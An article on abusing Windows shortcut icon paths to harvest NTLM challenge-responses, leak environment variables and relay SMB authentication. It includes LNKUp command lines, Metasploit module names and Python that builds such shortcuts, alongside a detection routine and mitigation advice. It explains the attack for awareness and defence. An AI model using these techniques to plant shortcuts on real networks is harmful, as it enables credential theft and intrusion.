This article looks at how standard Windows shortcut (.lnk) functionality can be abused to compromise systems, and how to defend against it.
How does it work and should I be afraid
Most Windows users probably know that launching suspicious programs and clicking unknown shortcuts is unsafe, and even the least careful of them try not to do so, so we will not dwell on that.
Most users have also, at least once, changed a shortcut's icon.
As a reminder, this is done through the shortcut's Properties, something like this:

And what values can be specified in this field?

Does the path have to be local? No. That is, you can put something like this here:

When a user browses to a directory containing such a shortcut, the following happens. Explorer resolves the icon path automatically in order to draw the icon, without the user clicking anything.
Wireshark capture on the machine 192.168.1.3:

The host 192.168.1.3 rejected the TCP connection because nothing was listening on TCP port 445 (SMB). At first glance there is nothing to worry about, but that is not so.
The host 192.168.1.3 can just as well complete the TCP handshake and behave like an SMB server, for example by running the corresponding Metasploit framework module. When such a server asks for NTLM authentication, the Windows SMB client answers with the logged-on user's credentials without prompting.

Let's browse to the directory with the shortcut again and then look at the Metasploit console:

We have obtained the NTLM challenge-response (commonly called the "NTLM hash"; NetNTLMv1 or NetNTLMv2 depending on the client's LAN Manager authentication level) of the user who merely "saw" our shortcut. This is not the NT hash itself and cannot be used for pass-the-hash directly, but it can be cracked offline or relayed.
This vulnerability (or rather, feature) has been known for more than 20 years, since the days of Windows NT / Windows 95, and still exists today. Microsoft's answer to it is NTLM Blocking, but the user or administrator must configure it themselves

and should first read up on all the caveats that come with it.

Some ISPs block outbound traffic to the Internet on TCP port 445, which also protects users who do not have the appropriate policies on their machines, but it does nothing against attacks on the local network, where the shortcut can point at an internal host exactly as in the example above.
LNKUp - automating the attack
The recently released LNKUp tool automates the creation of .lnk files like the one discussed above. It can be downloaded from the
official GitHub.
The utility is written in Python, runs on Windows and requires the Python packages pylnk and pypiwin32.

To create a shortcut that captures an NTLM hash, use the following command:
python generate.py --host HOST --type ntlm --output out.lnk
where HOST is the machine running the Metasploit SMB server.
The second use of LNKUp is reading the user's environment variables. This works because environment variables can be used in the shortcut's properties, like this:

To read them, run a sniffer on the machine 192.168.1.3.
The command to create a shortcut looks like this:
python generate.py --host 192.168.1.3 --output out.lnk --type environment --vars PROCESSOR_ARCHITECTURE
And in the traffic dump we will see:

That is, the icon path in the shortcut's properties looked like this:
\\192.168.1.3\SHARE_%PROCESSOR_ARCHITECTURE%
The variable is expanded by the victim's Explorer before the path is resolved, so its value ends up in the share name requested from our host.
Thus, the user does not need to launch anything; it is enough to open the directory containing the malicious shortcut, for example a network share, or to "see" it when plugging in removable media.
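Both tricks above (a UNC icon path that triggers SMB authentication, and an %ENV%-bearing icon path that leaks a variable's value) come down to a few fields of the Shell Link binary format. The following is an added example written for this article, not LNKUp's or the article's own code: it builds a minimal .lnk in memory following MS-SHLLINK (header, ICON_LOCATION string, IconEnvironmentDataBlock) and then parses arbitrary .lnk bytes to flag icon sources that point at a UNC path. The function names (build_lnk, parse_lnk, remote_icon_paths) and the sample inputs are constructed for illustration; the 192.168.1.3 address is reused from the article.

```python
"""Constructed example (not from the article or LNKUp): build a minimal
Windows shortcut whose icon lives on a UNC path, then parse .lnk bytes
to flag such icons.  Layout follows MS-SHLLINK; only the fields needed
here are modelled."""
import struct

HEADER_SIZE = 0x4C
LINK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
# LinkFlags bits (MS-SHLLINK 2.1.1)
HAS_LINK_TARGET_ID_LIST = 0x01
HAS_LINK_INFO = 0x02
HAS_NAME = 0x04
HAS_RELATIVE_PATH = 0x08
HAS_WORKING_DIR = 0x10
HAS_ARGUMENTS = 0x20
HAS_ICON_LOCATION = 0x40
IS_UNICODE = 0x80
# ExtraData blocks that carry %ENV%-style paths (260-byte ANSI + 520-byte Unicode)
ENV_VAR_BLOCK_SIG = 0xA0000001
ICON_ENV_BLOCK_SIG = 0xA0000007
ENV_BLOCK_SIZE = 0x314


def _env_block(signature, path):
    ansi = path.encode("cp1252", "replace")[:259].ljust(260, b"\0")
    unicode_ = path.encode("utf-16-le")[:518].ljust(520, b"\0")
    return struct.pack("<II", ENV_BLOCK_SIZE, signature) + ansi + unicode_


def build_lnk(icon_path, in_env_block=False):
    """Shortcut with no target whose icon is loaded from icon_path.
    With in_env_block=True the path is stored in an IconEnvironmentDataBlock,
    where Explorer expands %VAR% references before resolving it."""
    flags = IS_UNICODE
    string_data = b""
    if not in_env_block:
        flags |= HAS_ICON_LOCATION
        string_data = struct.pack("<H", len(icon_path)) + icon_path.encode("utf-16-le")
    header = struct.pack("<I", HEADER_SIZE) + LINK_CLSID
    header += struct.pack("<II", flags, 0)                  # LinkFlags, FileAttributes
    header += b"\0" * 24                                    # Creation/Access/Write FILETIMEs
    header += struct.pack("<IIIHHII", 0, 0, 1, 0, 0, 0, 0)  # FileSize, IconIndex, ShowCommand,
                                                            # HotKey, Reserved1-3
    extra = _env_block(ICON_ENV_BLOCK_SIG, icon_path) if in_env_block else b""
    return header + string_data + extra + b"\0\0\0\0"       # TerminalBlock


def parse_lnk(data):
    """Return LinkFlags, the StringData fields and any environment-block paths."""
    if (len(data) < HEADER_SIZE or struct.unpack_from("<I", data, 0)[0] != HEADER_SIZE
            or data[4:20] != LINK_CLSID):
        raise ValueError("not a Shell Link")
    flags = struct.unpack_from("<I", data, 20)[0]
    pos = HEADER_SIZE
    if flags & HAS_LINK_TARGET_ID_LIST:            # IDListSize (2 bytes) + IDList
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:                      # LinkInfoSize includes itself
        pos += struct.unpack_from("<I", data, pos)[0]
    result = {"flags": flags}
    for bit, name in ((HAS_NAME, "name"), (HAS_RELATIVE_PATH, "relative_path"),
                      (HAS_WORKING_DIR, "working_dir"), (HAS_ARGUMENTS, "arguments"),
                      (HAS_ICON_LOCATION, "icon_location")):
        if flags & bit:                            # CountCharacters (2 bytes) + chars
            count = struct.unpack_from("<H", data, pos)[0]
            pos += 2
            width = 2 if flags & IS_UNICODE else 1
            raw = data[pos:pos + count * width]
            result[name] = raw.decode("utf-16-le" if width == 2 else "cp1252")
            pos += count * width
    while pos + 8 <= len(data):                    # ExtraData until TerminalBlock (size < 4)
        size, sig = struct.unpack_from("<II", data, pos)
        if size < 4:
            break
        if size == ENV_BLOCK_SIZE and sig in (ENV_VAR_BLOCK_SIG, ICON_ENV_BLOCK_SIG):
            uni = data[pos + 8 + 260:pos + 8 + 260 + 520].decode("utf-16-le")
            key = "icon_env" if sig == ICON_ENV_BLOCK_SIG else "env_target"
            result[key] = uni.split("\0", 1)[0]
        pos += size
    return result


def remote_icon_paths(data):
    """Icon sources that make Explorer open an SMB connection merely by displaying
    the shortcut: UNC paths, including ones whose %VAR% parts are expanded on the
    victim before the share name is sent to the attacker's host."""
    info = parse_lnk(data)
    return [(key, info[key]) for key in ("icon_location", "icon_env")
            if key in info and info[key].startswith("\\\\")]


if __name__ == "__main__":
    samples = {                                    # constructed inputs
        "ntlm": build_lnk(r"\\192.168.1.3\share\x.ico"),
        "env": build_lnk(r"\\192.168.1.3\SHARE_%PROCESSOR_ARCHITECTURE%", in_env_block=True),
        "benign": build_lnk(r"%SystemRoot%\System32\shell32.dll", in_env_block=True),
    }
    for label, blob in samples.items():
        print(label, remote_icon_paths(blob))
```

Running remote_icon_paths over the .lnk files on a share (or on removable media before opening them in Explorer) is a cheap check for exactly the planted shortcuts described here; a local icon path such as %SystemRoot%\System32\shell32.dll is not flagged, while any path starting with \\ is, whether it sits in the ICON_LOCATION string or in the environment block.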
SMB Relay when browsing a directory
Using the Metasploit framework you can also start a different kind of SMB server with the
exploit/windows/smb/smb_relay module and carry out an SMB relay attack.

Now suppose the malicious shortcut is placed in a network share that administrators commonly use for installing software. The next time such a directory is opened, the administrator's NTLM authentication is relayed to a target machine of our choosing on the network. Two caveats apply: since MS08-068 the authentication cannot be relayed back to the very host it came from, and the relay fails against a target that requires SMB signing.

And we get a Meterpreter session.


From all of the above it follows that NTLM authentication should be abandoned wherever possible; where it cannot be, SMB signing should be required so that relaying fails, and outbound SMB to the Internet should be blocked. Increased attention should also be paid to network security and to write access on shared resources where an attacker can plant malicious objects.